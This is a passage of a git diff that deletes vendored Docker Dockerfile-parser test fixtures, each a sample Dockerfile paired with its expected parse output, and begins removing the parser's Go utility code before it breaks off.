-FROM image -MAINTAINER foo@bar.com -ENV GOPATH ` -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile deleted file mode 100644 index ef30414a5e..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile +++ /dev/null @@ -1,6 +0,0 @@ -#escape = ` - -FROM image -MAINTAINER foo@bar.com -ENV GOPATH ` -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile deleted file mode 100644 index 1ffb17ef08..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile +++ /dev/null @@ -1,14 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik \\Hollensbe \" - -RUN apt-get \update && \ - apt-get \"install znc -y -ADD \conf\\" /.znc - -RUN foo \ - -bar \ - -baz - -CMD [ "\/usr\\\"/bin/znc", "-f", "-r" ] diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result deleted file mode 100644 index 13e409cb1a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result +++ /dev/null @@ -1,6 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik \\\\Hollensbe \\\"") -(run "apt-get \\update && apt-get \\\"install znc -y") -(add "\\conf\\\\\"" "/.znc") -(run "foo bar baz") -(cmd "/usr\\\"/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile deleted file mode 100644 index 2418e0f069..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -FROM scratch -COPY foo /tmp/ -COPY --user=me foo /tmp/ -COPY --doit=true foo /tmp/ -COPY --user=me --doit=true foo /tmp/ -COPY --doit=true -- foo /tmp/ -COPY -- foo /tmp/ -CMD --doit [ "a", "b" ] -CMD --doit=true -- [ "a", "b" ] -CMD --doit -- [ ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result deleted file mode 100644 index 4578f4cba4..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "scratch") -(copy "foo" "/tmp/") -(copy ["--user=me"] "foo" "/tmp/") -(copy ["--doit=true"] "foo" "/tmp/") -(copy ["--user=me" "--doit=true"] "foo" "/tmp/") -(copy ["--doit=true"] "foo" "/tmp/") -(copy "foo" "/tmp/") -(cmd ["--doit"] "a" "b") -(cmd ["--doit=true"] "a" "b") -(cmd ["--doit"]) diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile 
deleted file mode 100644 index 081e442882..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -FROM debian -ADD check.sh main.sh /app/ -CMD /app/main.sh -HEALTHCHECK -HEALTHCHECK --interval=5s --timeout=3s --retries=3 \ - CMD /app/check.sh --quiet -HEALTHCHECK CMD -HEALTHCHECK CMD a b -HEALTHCHECK --timeout=3s CMD ["foo"] -HEALTHCHECK CONNECT TCP 7000 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result deleted file mode 100644 index 092924f88c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result +++ /dev/null @@ -1,9 +0,0 @@ -(from "debian") -(add "check.sh" "main.sh" "/app/") -(cmd "/app/main.sh") -(healthcheck) -(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet") -(healthcheck "CMD") -(healthcheck "CMD" "a b") -(healthcheck ["--timeout=3s"] "CMD" "foo") -(healthcheck "CONNECT" "TCP 7000") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile deleted file mode 100644 index 587fb9b54b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile +++ /dev/null @@ -1,15 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update && apt-get install wget -y -RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb -RUN dpkg -i influxdb_latest_amd64.deb -RUN rm -r /opt/influxdb/shared - -VOLUME /opt/influxdb/shared - -CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml - -EXPOSE 8083 -EXPOSE 8086 -EXPOSE 8090 -EXPOSE 8099 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result deleted file mode 100644 index 0998e87e63..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result +++ /dev/null @@ -1,11 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update && apt-get install wget -y") -(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb") -(run "dpkg -i influxdb_latest_amd64.deb") -(run "rm -r /opt/influxdb/shared") -(volume "/opt/influxdb/shared") -(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml") -(expose "8083") -(expose "8086") -(expose "8090") -(expose "8099") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile deleted file mode 100644 index 39fe27d99c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result deleted file mode 100644 index afc220c2a7..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile deleted file mode 100644 index eaae081a06..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD '["echo", "Well, JSON in a string is JSON too?"]' diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result deleted file mode 100644 index 484804e2b2..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile deleted file mode 100644 index c3ac63c07a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ['echo','single quotes are invalid JSON'] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result deleted file mode 100644 index 6147891207..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "['echo','single quotes are invalid JSON']") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile 
b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile deleted file mode 100644 index 5fd4afa522..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ["echo", "Please, close the brackets when you're done" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result deleted file mode 100644 index 1ffbb8ff85..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "[\"echo\", \"Please, close the brackets when you're done\"") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile deleted file mode 100644 index 30cc4bb48f..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD ["echo", "look ma, no quote!] 
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result deleted file mode 100644 index 32048147b5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result +++ /dev/null @@ -1 +0,0 @@ -(cmd "[\"echo\", \"look ma, no quote!]") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile deleted file mode 100644 index a586917110..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile +++ /dev/null @@ -1,8 +0,0 @@ -CMD [] -CMD [""] -CMD ["a"] -CMD ["a","b"] -CMD [ "a", "b" ] -CMD [ "a", "b" ] -CMD [ "a", "b" ] -CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result deleted file mode 100644 index c6553e6e1a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result +++ /dev/null @@ -1,8 +0,0 @@ -(cmd) -(cmd "") -(cmd "a") -(cmd "a" "b") -(cmd "a" "b") -(cmd "a" "b") -(cmd "a" "b") -(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile deleted file mode 100644 index 35f9c24aa6..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER James Turnbull "james@example.com" -ENV 
REFRESHED_AT 2014-06-01 -RUN apt-get update -RUN apt-get -y install redis-server redis-tools -EXPOSE 6379 -ENTRYPOINT [ "/usr/bin/redis-server" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result deleted file mode 100644 index b5ac6fe445..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result +++ /dev/null @@ -1,7 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "James Turnbull \"james@example.com\"") -(env "REFRESHED_AT" "2014-06-01") -(run "apt-get update") -(run "apt-get -y install redis-server redis-tools") -(expose "6379") -(entrypoint "/usr/bin/redis-server") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile deleted file mode 100644 index 188395fe83..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile +++ /dev/null @@ -1,48 +0,0 @@ -FROM busybox:buildroot-2014.02 - -MAINTAINER docker - -ONBUILD RUN ["echo", "test"] -ONBUILD RUN echo test -ONBUILD COPY . / - - -# RUN Commands \ -# linebreak in comment \ -RUN ["ls", "-la"] -RUN ["echo", "'1234'"] -RUN echo "1234" -RUN echo 1234 -RUN echo '1234' && \ - echo "456" && \ - echo 789 -RUN sh -c 'echo root:testpass \ - > /tmp/passwd' -RUN mkdir -p /test /test2 /test3/test - -# ENV \ -ENV SCUBA 1 DUBA 3 -ENV SCUBA "1 DUBA 3" - -# CMD \ -CMD ["echo", "test"] -CMD echo test -CMD echo "test" -CMD echo 'test' -CMD echo 'test' | wc - - -#EXPOSE\ -EXPOSE 3000 -EXPOSE 9000 5000 6000 - -USER docker -USER docker:root - -VOLUME ["/test"] -VOLUME ["/test", "/test2"] -VOLUME /test3 - -WORKDIR /test - -ADD . / -COPY . 
copy diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result deleted file mode 100644 index 6f7d57a396..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result +++ /dev/null @@ -1,29 +0,0 @@ -(from "busybox:buildroot-2014.02") -(maintainer "docker ") -(onbuild (run "echo" "test")) -(onbuild (run "echo test")) -(onbuild (copy "." "/")) -(run "ls" "-la") -(run "echo" "'1234'") -(run "echo \"1234\"") -(run "echo 1234") -(run "echo '1234' && echo \"456\" && echo 789") -(run "sh -c 'echo root:testpass > /tmp/passwd'") -(run "mkdir -p /test /test2 /test3/test") -(env "SCUBA" "1 DUBA 3") -(env "SCUBA" "\"1 DUBA 3\"") -(cmd "echo" "test") -(cmd "echo test") -(cmd "echo \"test\"") -(cmd "echo 'test'") -(cmd "echo 'test' | wc -") -(expose "3000") -(expose "9000" "5000" "6000") -(user "docker") -(user "docker:root") -(volume "/test") -(volume "/test" "/test2") -(volume "/test3") -(workdir "/test") -(add "." "/") -(copy "." 
"copy") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile deleted file mode 100644 index f64c1168c1..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y -ADD .muttrc / -ADD .offlineimaprc / -ADD .tmux.conf / -ADD mutt /.mutt -ADD vim /.vim -ADD vimrc /.vimrc -ADD crontab /etc/crontab -RUN chmod 644 /etc/crontab -RUN mkdir /Mail -RUN mkdir /.offlineimap -RUN echo "export TERM=screen-256color" >/.zshenv - -CMD setsid cron; tmux -2 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result deleted file mode 100644 index a0efcf04b6..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result +++ /dev/null @@ -1,14 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y") -(add ".muttrc" "/") -(add ".offlineimaprc" "/") -(add ".tmux.conf" "/") -(add "mutt" "/.mutt") -(add "vim" "/.vim") -(add "vimrc" "/.vimrc") -(add "crontab" "/etc/crontab") -(run "chmod 644 /etc/crontab") -(run "mkdir /Mail") -(run "mkdir /.offlineimap") -(run "echo \"export TERM=screen-256color\" >/.zshenv") -(cmd "setsid cron; tmux -2") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile deleted file mode 100644 index 57bb5976a3..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile +++ /dev/null @@ -1,3 +0,0 @@ -FROM foo - 
-VOLUME /opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result deleted file mode 100644 index 18dbdeeaa0..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result +++ /dev/null @@ -1,2 +0,0 @@ -(from "foo") -(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile deleted file mode 100644 index 5b9ec06a6c..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update && apt-get install libcap2-bin mumble-server -y - -ADD ./mumble-server.ini /etc/mumble-server.ini - -CMD /usr/sbin/murmurd diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result deleted file mode 100644 index a0036a943e..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result +++ /dev/null @@ -1,4 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update && apt-get install libcap2-bin mumble-server -y") -(add "./mumble-server.ini" "/etc/mumble-server.ini") -(cmd "/usr/sbin/murmurd") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile deleted file mode 100644 index bf8368e1ca..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile +++ 
/dev/null @@ -1,14 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik Hollensbe - -RUN apt-get update && apt-get install nginx-full -y -RUN rm -rf /etc/nginx -ADD etc /etc/nginx -RUN chown -R root:root /etc/nginx -RUN /usr/sbin/nginx -qt -RUN mkdir /www - -CMD ["/usr/sbin/nginx"] - -VOLUME /www -EXPOSE 80 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result deleted file mode 100644 index 56ddb6f258..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result +++ /dev/null @@ -1,11 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik Hollensbe ") -(run "apt-get update && apt-get install nginx-full -y") -(run "rm -rf /etc/nginx") -(add "etc" "/etc/nginx") -(run "chown -R root:root /etc/nginx") -(run "/usr/sbin/nginx -qt") -(run "mkdir /www") -(cmd "/usr/sbin/nginx") -(volume "/www") -(expose "80") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile deleted file mode 100644 index 72b79bdd7d..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile +++ /dev/null @@ -1,23 +0,0 @@ -FROM ubuntu:12.04 - -EXPOSE 27015 -EXPOSE 27005 -EXPOSE 26901 -EXPOSE 27020 - -RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y -RUN mkdir -p /steam -RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam -ADD ./script /steam/script -RUN /steam/steamcmd.sh +runscript /steam/script -RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf -RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf -ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg -ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg -ADD ./sourcemod.cfg 
/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg -RUN rm -r /steam/tf2/tf/addons/sourcemod/configs -ADD ./configs /steam/tf2/tf/addons/sourcemod/configs -RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en -RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en - -CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result deleted file mode 100644 index d4f94cd8be..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result +++ /dev/null @@ -1,20 +0,0 @@ -(from "ubuntu:12.04") -(expose "27015") -(expose "27005") -(expose "26901") -(expose "27020") -(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y") -(run "mkdir -p /steam") -(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam") -(add "./script" "/steam/script") -(run "/steam/steamcmd.sh +runscript /steam/script") -(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf") -(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf") -(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg") -(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg") -(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg") -(run "rm -r /steam/tf2/tf/addons/sourcemod/configs") -(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs") -(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en") -(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en") -(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate 
-steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile deleted file mode 100644 index 4842088166..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y - -ADD .weechat /.weechat -ADD .tmux.conf / -RUN echo "export TERM=screen-256color" >/.zshenv - -CMD zsh -c weechat diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result deleted file mode 100644 index c3abb4c54f..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result +++ /dev/null @@ -1,6 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y") -(add ".weechat" "/.weechat") -(add ".tmux.conf" "/") -(run "echo \"export TERM=screen-256color\" >/.zshenv") -(cmd "zsh -c weechat") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile deleted file mode 100644 index 3a4da6e916..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik Hollensbe - -RUN apt-get update && apt-get install znc -y -ADD conf /.znc - -CMD [ "/usr/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result deleted file mode 100644 index 5493b255fd..0000000000 --- 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result +++ /dev/null @@ -1,5 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik Hollensbe ") -(run "apt-get update && apt-get install znc -y") -(add "conf" "/.znc") -(cmd "/usr/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go deleted file mode 100644 index cd7af75e79..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go +++ /dev/null @@ -1,176 +0,0 @@ -package parser - -import ( - "fmt" - "strconv" - "strings" - "unicode" -) - -// Dump dumps the AST defined by `node` as a list of sexps. -// Returns a string suitable for printing. -func (node *Node) Dump() string { - str := "" - str += node.Value - - if len(node.Flags) > 0 { - str += fmt.Sprintf(" %q", node.Flags) - } - - for _, n := range node.Children { - str += "(" + n.Dump() + ")\n" - } - - if node.Next != nil { - for n := node.Next; n != nil; n = n.Next { - if len(n.Children) > 0 { - str += " " + n.Dump() - } else { - str += " " + strconv.Quote(n.Value) - } - } - } - - return strings.TrimSpace(str) -} - -// performs the dispatch based on the two primal strings, cmd and args. Please -// look at the dispatch table in parser.go to see how these dispatchers work. -func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) { - fn := dispatch[cmd] - - // Ignore invalid Dockerfile instructions - if fn == nil { - fn = parseIgnore - } - - sexp, attrs, err := fn(args, d) - if err != nil { - return nil, nil, err - } - - return sexp, attrs, nil -} - -// splitCommand takes a single line of text and parses out the cmd and args, -// which are used for dispatching to more exact parsing functions. 
-func splitCommand(line string) (string, []string, string, error) { - var args string - var flags []string - - // Make sure we get the same results irrespective of leading/trailing spaces - cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2) - cmd := strings.ToLower(cmdline[0]) - - if len(cmdline) == 2 { - var err error - args, flags, err = extractBuilderFlags(cmdline[1]) - if err != nil { - return "", nil, "", err - } - } - - return cmd, flags, strings.TrimSpace(args), nil -} - -// covers comments and empty lines. Lines should be trimmed before passing to -// this function. -func stripComments(line string) string { - // string is already trimmed at this point - if tokenComment.MatchString(line) { - return tokenComment.ReplaceAllString(line, "") - } - - return line -} - -func extractBuilderFlags(line string) (string, []string, error) { - // Parses the BuilderFlags and returns the remaining part of the line - - const ( - inSpaces = iota // looking for start of a word - inWord - inQuote - ) - - words := []string{} - phase := inSpaces - word := "" - quote := '\000' - blankOK := false - var ch rune - - for pos := 0; pos 